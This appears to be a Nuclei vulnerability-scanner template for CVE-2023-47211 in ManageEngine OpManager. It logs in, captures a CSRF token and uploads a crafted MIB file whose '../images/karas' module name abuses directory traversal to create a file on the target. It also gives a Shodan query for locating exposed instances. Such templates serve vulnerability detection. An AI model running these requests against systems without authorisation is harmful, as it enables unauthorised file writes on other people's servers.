id: CVE-2023-47211 info: name: ManageEngine OpManager - Directory Traversal author: gy741 severity: high description: | A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851 - https://nvd.nist.gov/vuln/detail/CVE-2023-47211 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 8.6 cve-id: CVE-2023-47211 cwe-id: CWE-22 epss-score: 0.000610000 epss-percentile: 0.238320000 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"OpManager Plus" tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi http: - raw: - | POST /two_factor_auth HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded j_username={{username}}&j_password={{password}} - | POST /client/api/json/mibbrowser/uploadMib HTTP/1.1 Host: {{Hostname}} X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}} Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262 -----------------------------372334936941313273904263503262 Content-Disposition: form-data; name="mibFile"; filename="karas.txt" Content-Type: text/plain ../images/karas DEFINITIONS ::= BEGIN IMPORTS enterprises FROM RFC1155-SMI; microsoft OBJECT IDENTIFIER ::= { enterprises 311 } software OBJECT IDENTIFIER ::= { microsoft 1 } systems OBJECT IDENTIFIER ::= { software 1 } os OBJECT IDENTIFIER ::= { systems 3 } windowsNT OBJECT IDENTIFIER ::= { os 1 } windows OBJECT IDENTIFIER ::= { os 2 } workstation OBJECT IDENTIFIER ::= { windowsNT 1 } server OBJECT IDENTIFIER ::= { windowsNT 2 } dc OBJECT IDENTIFIER ::= { windowsNT 3 } END -----------------------------372334936941313273904263503262-- - | POST /client/api/json/mibbrowser/uploadMib HTTP/1.1 Host: {{Hostname}} X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}} Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262 -----------------------------372334936941313273904263503262 Content-Disposition: form-data; name="mibFile"; filename="karas.txt" Content-Type: text/plain ../images/karas DEFINITIONS ::= BEGIN IMPORTS enterprises FROM RFC1155-SMI; microsoft OBJECT IDENTIFIER ::= { enterprises 311 } software OBJECT IDENTIFIER ::= { microsoft 1 } systems OBJECT IDENTIFIER ::= { software 1 } os OBJECT IDENTIFIER ::= { systems 3 } windowsNT OBJECT IDENTIFIER ::= { os 1 } windows OBJECT IDENTIFIER ::= { os 2 } workstation OBJECT IDENTIFIER ::= { windowsNT 1 } server OBJECT IDENTIFIER ::= { windowsNT 2 } dc OBJECT IDENTIFIER ::= { windowsNT 3 } END -----------------------------372334936941313273904263503262-- host-redirects: true max-redirects: 3 matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains(body, "MIBFile with same name already exists")' condition: and extractors: - type: regex name: x_zcsrf_token group: 1 part: header regex: - 'Set-Cookie: opmcsrfcookie=([^;]{50,})' internal: true # digest: 4a0a00473045022100d0db16ab8c46ac09c0a481c477c237858642663e12d9ddd8734591713833a2a7022026241af2d76fb1c58e6b80046a5ae5c231df7ac82ce627e4cc345bb039b87a09:922c64590222798bb761d5b6d8e72950